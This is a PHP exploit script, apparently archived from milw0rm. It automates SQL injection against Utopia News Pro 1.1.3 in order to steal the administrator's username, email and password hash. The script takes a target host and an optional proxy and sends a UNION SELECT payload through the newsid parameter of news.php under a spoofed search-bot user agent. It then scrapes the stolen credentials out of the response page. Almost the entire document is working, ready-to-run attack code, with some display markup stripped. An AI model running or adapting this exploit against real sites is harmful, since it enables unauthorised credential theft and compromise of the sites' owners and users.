SQL INJECTION: /str0ke # # 3.10 07/10/2005 # # utopia_xpl.php # # # # Utopia News Pro 1.1.3 (possibly prior versions) SQL Injection / # # Administrative credentials disclosure # # by rgod # # site: http://rgod.altervista.org # # # # make these changes in php.ini if you have troubles # # to launch this script: # # allow_call_time_pass_reference = on # # register_globals = on # # # # usage: launch this script from Apache, fill requested fields, then # # ... grab admin MD5 passowrd hash right now # # # # Sun-Tzu: "All warfare is based on deception" # error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo' Utopia News Pro 1.1.3 SQL Injection

Utopia News Pro 1.1.3 SQL Injection

a script by rgod at http://rgod.altervista.org

hostname (ex: www.sitename.c om)

path (ex: /utopia/ or just /)

specify a port other than 80 (default value)

send exploit through an HTTP proxy (ip:port)

'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket($packet) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path<>'') and ($host<>'')) { if ($port=='') {$port=80;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $sql="-1' UNION SELECT null,'20051007',username,password,null,email,null FROM unp_user WHERE userid=1 /*"; #switch to this for some versions prior from 1.1.3 (different number of columns...) #$sql="-1' UNION SELECT null,'20051007',username,password,null,email FROM unp_user WHERE userid=1 /*"; $sql=urlencode($sql); $packet="GET ".$p."news.php?action=printable&newsid=".$sql." HTTP/1.0 \r\n"; $packet.="User-Agent: msnbot/1.0 (+http://search.msn.com/msnbot.htm)\r\n"; $packet.="Accept: */*\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host.":".$port."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); sendpacket($packet); # you can see hash inside html, but if version is the one I tested we can try to find it now... $temp=explode("",$html); $temp2=explode("",$temp[1]); $temp3=explode("",$temp2[1]); $username=$temp3[0]; echo '

username: '.htmlentities($username).'
'; $temp=explode("Posted by ",$html); $temp2=explode("on",$temp[1]); $email=trim($temp2[0]); echo 'email: '.htmlentities($email).'
'; $temp=explode("",$html); $temp2=explode("",$temp[1]); $temp3=explode("",$temp2[1]); $hash=trim($temp3[0]); echo 'hash: '.htmlentities($hash).'
'; } else {echo '
Fill requested fields, optionally specify a proxy...
';} ?> # milw0rm.com [2005-10-06]